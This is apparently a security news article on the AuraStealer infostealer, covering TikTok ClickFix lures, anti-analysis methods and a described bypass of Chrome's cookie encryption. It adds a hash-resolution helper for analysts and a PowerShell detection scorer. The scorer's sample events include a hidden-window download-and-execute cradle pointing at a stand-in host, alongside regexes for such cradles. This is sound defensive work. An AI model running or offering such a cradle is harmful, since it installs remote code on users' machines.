PROBABLYPWNED
Malware · March 16, 2026 · 4 min read

AuraStealer Spreads via TikTok ClickFix Scams, Targets 110+ Browsers

Russian-linked AuraStealer infostealer uses TikTok videos and 48 C2 domains to steal credentials. ABE bypass defeats Chrome's cookie encryption.

James Rivera

A new infostealer called AuraStealer has emerged as a significant threat, leveraging TikTok videos, sophisticated anti-analysis techniques, and a bypass for Chrome's Application-Bound Encryption to harvest credentials from over 110 browsers.

Security researchers at GenDigital and Intrinsec have published technical analyses revealing the malware's capabilities, which position it as a direct competitor to the now-disrupted LummaC2 stealer.

TikTok as a Distribution Channel

AuraStealer reaches victims through ClickFix-style social engineering—the same technique we've seen in multiple campaigns this year. But the operators have found a new delivery channel: TikTok.

Short videos pose as tutorials for activating pirated software like Windows, Microsoft 365, Adobe Photoshop, Netflix, and Spotify. Viewers are instructed to open PowerShell with administrator privileges and run a one-line command. That command downloads and executes AuraStealer silently.

The social engineering exploits the platform's format. TikTok videos are short, casual, and often consumed without skepticism. Users searching for "free software activation" find exactly what they're looking for—along with malware.

48 C2 Domains and a Subscription Model

Intrinsec analysts identified 48 command-and-control domains linked to AuraStealer operations. Early versions (1.0.x through 1.2.x) used .SHOP domains, while newer 1.5.2 samples favor .CFD addresses—an infrastructure rotation likely designed to evade blocklists.

The malware operates on a subscription model, sold by the "AuraCorp" team on Russian-language cybercrime forums:

  • Basic: $295/month
  • Advanced: $585/month
  • Team: Collaborative access

The operators claim 5-11 years of experience and market AuraStealer as a successor to LummaC2, which was disrupted in mid-2025.

Technical Sophistication

AuraStealer employs multiple layers of evasion that complicate analysis:

Exception-Driven API Hashing: Instead of calling Windows API functions directly, the malware triggers deliberate EXCEPTION_ACCESS_VIOLATION exceptions caught by a custom handler. Functions are resolved using MurmurHash3 (seeded with 0xDEADBEEF) combined with FNV-1a hashing. XOR-masked addresses in lookup tables map to actual function addresses.
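As an added example (not code from the GenDigital or Intrinsec analyses), the two hash functions named above implemented in Python so an analyst can precompute values for known export names and map a 32-bit value pulled from a sample's lookup table back to an API name. The page does not say how AuraStealer combines MurmurHash3 with FNV-1a or what XOR mask it applies, so the table keeps the two algorithms separate and unmasking is left to the analyst.

```python
import struct

AURA_SEED = 0xDEADBEEF  # MurmurHash3 seed reported for AuraStealer
MASK32 = 0xFFFFFFFF

def _rotl32(x, r):
    return ((x << r) | (x >> (32 - r))) & MASK32

def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 (Austin Appleby's reference algorithm)."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h, n = seed & MASK32, len(data)
    for i in range(0, n - n % 4, 4):           # full 4-byte little-endian blocks
        k = struct.unpack_from("<I", data, i)[0]
        k = _rotl32((k * c1) & MASK32, 15)
        h ^= (k * c2) & MASK32
        h = (_rotl32(h, 13) * 5 + 0xE6546B64) & MASK32
    tail, k = data[n - n % 4:], 0                # 0-3 trailing bytes
    if len(tail) == 3: k ^= tail[2] << 16
    if len(tail) >= 2: k ^= tail[1] << 8
    if tail:
        k ^= tail[0]
        h ^= (_rotl32((k * c1) & MASK32, 15) * c2) & MASK32
    h ^= n                                       # finalisation mix (fmix32)
    h = ((h ^ (h >> 16)) * 0x85EBCA6B) & MASK32
    h = ((h ^ (h >> 13)) * 0xC2B2AE35) & MASK32
    return h ^ (h >> 16)

def fnv1a_32(data: bytes) -> int:
    """FNV-1a, 32-bit variant (offset basis 0x811C9DC5, prime 0x01000193)."""
    h = 0x811C9DC5
    for b in data:
        h = ((h ^ b) * 0x01000193) & MASK32
    return h

def build_hash_table(names, seed=AURA_SEED):
    """Map (algorithm, hash) -> export name for every name in the wordlist."""
    table = {}
    for name in names:
        raw = name.encode("ascii")
        table[("murmur3", murmur3_32(raw, seed))] = name
        table[("fnv1a", fnv1a_32(raw))] = name
    return table

def resolve_hash(table, value):
    """Return (name, algorithm) for a 32-bit value found in the sample, or None."""
    for algo in ("murmur3", "fnv1a"):
        name = table.get((algo, value & MASK32))
        if name:
            return name, algo
    return None
```

In practice the wordlist is the export table of ntdll.dll and kernel32.dll (for example read with pefile), and the resolved names can be applied as comments in the disassembler.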

Heaven's Gate: The 32-bit malware executes 64-bit NTDLL calls to evade detection during browser injection operations.

Comprehensive Anti-Analysis: Checks include anti-tampering via binary checksum verification, Sleep hook detection, emulator artifact searches (looking for usernames like "JohnDoe" and "HAL9TH"), CPUID checks for virtualization, minimum processor count requirements (4+), and PEB flag inspection for debugger detection.

Geolocation Blocking: The malware checks system locale settings and blocks execution in certain countries—likely to avoid compromising systems in the operators' home region.

Breaking Chrome's Cookie Encryption

AuraStealer's most concerning capability is its bypass of Chrome's Application-Bound Encryption (ABE), which Google introduced to protect cookies and session tokens.

The stealer spawns Chrome in suspended headless mode, injects code via shared memory sections (NtCreateSection, NtMapViewOfSection), and invokes IElevator::Decrypt to decrypt the app_bound_encrypted_key. Temporary files facilitate inter-process communication for the encrypted key exchange.

This technique defeats protections that Google implemented specifically to prevent infostealer credential theft.

What Gets Stolen

AuraStealer targets:

  • Browser data from 110+ browsers (passwords, cookies, autofill)
  • 70+ cryptocurrency wallet extensions and desktop wallets
  • Session tokens (Discord, Telegram, Steam)
  • 2FA authenticator data
  • Recovery seeds and private keys
  • Remote access configurations (AnyDesk, FileZilla)
  • Password manager databases
  • VPN configurations
  • Clipboard contents and screenshots

All exfiltrated data is AES-CBC encrypted with randomly generated keys before transmission to C2 servers via three dedicated endpoints.

Defense Recommendations

Organizations should:

  1. Block known AuraStealer C2 domains at the network perimeter
  2. Monitor for PowerShell execution patterns consistent with ClickFix attacks
  3. Implement application whitelisting to prevent unauthorized script execution
  4. Educate users about software piracy risks—the primary distribution vector
  5. Deploy endpoint detection focused on browser injection techniques

The ClickFix technique continues to prove effective because it bypasses traditional security controls. The victim manually executes the malicious command, making it appear as legitimate user activity.
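Recommendation 2 above in working form, as an added example that is not part of the original article: a scorer over process-creation events that flags PowerShell launched from an interactive parent (explorer.exe for a Win+R Run dialog) whose command line carries a download-and-execute cradle or console-hiding flags. The three events are constructed samples in a Sysmon Event ID 1 style, not real telemetry, and the thresholds and regexes are this example's own assumptions.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/a | iex"'},
    {"ParentImage": r"C:\Program Files\Git\usr\bin\bash.exe", "Image": PS,
     "CommandLine": r"powershell -File .\build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Get-Process"},
]

# Download-and-execute cradle tokens typical of ClickFix one-liners.
CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
                    r"invoke-expression|iex|frombase64string)\b|-e(nc|ncodedcommand)?\s", re.I)
# Flags that hide the console or disable policy; a user following a tutorial rarely needs them.
QUIET = re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-nop(rofile)?\b", re.I)
# The Run dialog and desktop launches show up as children of explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one event; score 0 when it is not PowerShell."""
    if basename(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    cl, reasons = ev["CommandLine"], []
    if basename(ev["ParentImage"]) in INTERACTIVE_PARENTS:
        reasons.append("launched from an interactive shell (Run dialog / Explorer)")
    if CRADLE.search(cl):
        reasons.append("download-and-execute cradle in command line")
    if QUIET.search(cl):
        reasons.append("hidden window or execution-policy bypass")
    return len(reasons), reasons

def find_clickfix_candidates(events, threshold=2):
    """Indexes and reasons for events reaching the threshold; one signal alone is too noisy."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, reasons))
    return hits
```

Running find_clickfix_candidates(SAMPLE_EVENTS) flags only the first event; the build script and the interactive Get-Process each trip at most one signal and stay below the threshold.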

For a list of IOCs including C2 domains and sample hashes, see the GenDigital technical report.
